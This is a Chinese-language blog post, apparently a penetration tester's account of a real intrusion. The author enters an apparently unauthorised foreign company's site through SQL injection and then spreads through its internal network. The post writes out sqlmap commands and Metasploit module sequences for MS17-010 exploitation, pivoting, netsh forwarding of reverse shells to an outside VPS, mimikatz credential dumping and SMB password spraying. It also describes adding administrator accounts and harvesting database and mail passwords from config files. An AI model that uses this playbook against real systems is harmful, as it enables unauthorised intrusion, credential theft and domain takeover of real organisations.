0x00前言
有技術交流或滲透測試培訓需求的朋友歡迎聯系QQ/VX-547006660,需要代碼審計、滲透測試、紅藍對抗網絡安全相關業務可以看置頂博文
2000人網絡安全交流群,歡迎大佬們來玩
群號820783253
本文來首發重生信息安全(本人所在team之一),歡迎各位大佬關注公眾號~
前段時間看了一下內網滲透,所以想找個環境練習一下,恰好有個兄弟丟了個站點出來,一起“練習內網”,然后就開始了“實戰代練”。由於“懶”,所以記錄時間和截圖有些是補的。
0x00 外網入口點
打開站點(這里用baidu.com替代)看了看,左翻翻右翻翻能看到很明顯的“注入”點。簡單測試一下(and 1=1、1=2),返回不一樣,所以sqlmap一把梭。
Thread 10開十個線程,跑的能快點
sqlmap -u https://baidu.com/detail.asp?Prod=2222222222 --random-agent --thread 10
估計外國站和帶寬的原因,跑的很慢。所以走了一遍正常的信息收集:
真實ip:8.8.8.8
Web容器:Microsoft-IIS/7.5
子域名:
mailserver.baidu.com
mail.baidu.com
端口:80、443
......
發現頁面登錄處admin有個萬能密碼,登錄進去發現只有查看賬單的一些功能,所以沒用。
C段發現用同一套模板的站,判斷是屬同一家,所以也注入點跑了一遍。發現這個站跑的比目標站快很多,所以先搞。
--is-dba為dba權限,故os--shell試試,權限system
兩個站都是08系統+sql注入+dba權限+system權限,直接拿到權限一條龍。外網入口點太輕松,可忽略,抱着學內網的心態。都一樣的站,所以搞目標站。
0x01 中轉搗鼓
執行回顯得很慢,加了threads 10也是很慢。想着上cs和msf,死活不上線,懷疑有殺軟或者攔截協議或者其他。
ceye試一下 ping xxxxxxx.ceye.io
平台有記錄,能通外網。但是bitsadmin等下載命令都試了,不上線。走echo寫馬路線。
先找到web的目錄,目錄在C盤根目錄?
寫了n次馬子,愣是沒上去,位置不對還是有查殺小馬的玩意?嗯,位置不對(猜可能有其他盤,d盤bingo)和好像還有個殺馬子的玩意(用了個大小寫換下,^是轉義字符)。
0x02 驚現殺軟
查看進程,之前發現有進程有ekrn.exe,egui.exe(eset的進程),不會免殺的我浪死在沙灘上。之前在刀上能執行命令的,這次回去補圖居然執行不了命令了。sqlmap那個執行回顯太慢,找張內網機子的圖補一下(它內網機子都裝了eset)。
翻翻文件(無腦子的翻,不確定哪些重要哪些不重要,感覺都重要),看看有什么數據庫密碼什么的。找到一些配置文件,發現數據庫密碼、郵服密碼?。(在某個文件夾里面發現同行的腳本,應該沒被日穿吧。)
先留着這些賬號密碼,存着之后可以考慮進入內網開始爆破操作。
0x03 msf大殺四方
直接用之前獲取到的Sqlserver的sa賬號密碼,xp_cmdshell執行命令
Msf監聽接收到shell,然后開啟內網轉發進入內網。
run autoroute –s 網段
MS17-010安排上,秒殺內網開始
Use auxiliary/scanner/smb/smb_ms17_010
Set rhosts 網段ip
Set threads 線程
run
這很泰國ms17-010基本都沒打補丁。
搜集了一下信息,發現199ip很可能是個域控,存在大量用戶(199不出網,不通外網)。
因為殺軟問題直接利用ms17-010反彈shell是無法成功的,這里我們使用ms17-010命令執行的exp。
Use auxiliary/admin/smb/ms17_010_command
Set command 執行的命令
Set rhosts 目標
Run
Ok執行成功,添加用戶和管理組
然后regeorg配和proxifier用之前的外網口子進入內網(regeorg通過web腳本文件將內網流量轉發出來,具體可百度學習)
然后遠程到199ip的桌面,下面讓199ip主機反彈shell到msf。
我們已經拿到6的權限,可以使用微軟自帶的netsh轉發進行中轉shell。
我們這里設置的是將訪問ip 10.1.1.6 8081端口的流量全部轉發到外網vps 4478端口
199這個IP直接反彈shell到6的8081端口。(6會通過netsh設置轉發到公網VPS上)。
199這個主機也沒什么東西讀波密碼溜。(讀密碼需要system權限我們使用ms17-010進行提權)
通過ms17提權成功,讀密碼。
Load mimikatz 加載mimikatz
Kerberos 讀取明文
我們拿到了199的明文密碼。(下面我們利用此密碼進行撞C段主機)。
Use auxiliary/scanner/smb/smb_login
Set rhosts IP
Set smbuser 用戶名
Set smbpass 密碼
Set threads 線程
Run
撞出了大量主機
此時行總發來了電報說他腰疼,七夕節腰疼有點意思。
通過行總發來的文檔,得知內網存在5個C段,每個段都存在域控??
前邊已經得知10ip主機存在ms17(通外網,直接添加管理員用戶)。
然后在進行IPC進行連接。
然后把馬copy到目標C盤。
使用ms17進行執行木馬反彈shell。
讀取密碼進行遠程桌面連接。
Run getgui –e 開啟遠程桌面。
域內沒有一台主機卧槽?域不要錢一樣的搭建。(我們把目標轉向1 IP主機 貌似還挺多域內主機 1的域為ESOURCE)。
1 IP主機沒有可利用系統漏洞,目標轉向域內用戶,碰碰運氣看能不能讀到域管理密碼。(先攻擊存在ms17的域內主機)
基本套路ms17添加用戶IPC上傳文件ms17執行木馬。(不要問我為啥不直接彈shell,因為殺軟攔截,為啥攔截?我不知道!)
讀了兩台域內主機的密碼,都沒有讀到域用戶密碼。(連個域普通用戶都沒有,拿到一個普通用戶還能搞個黃金票據)。
最后目標鎖定在79 IP上 他的本地管理員密碼和199 IP主機本地管理員密碼相同。
最后成功讀到一枚域管理密碼,deng登陸進去
這特碼是域環境?這特碼是工作組吧。
頭疼死了,其他段的域控制器不想搞了,本次內網滲透就此結束。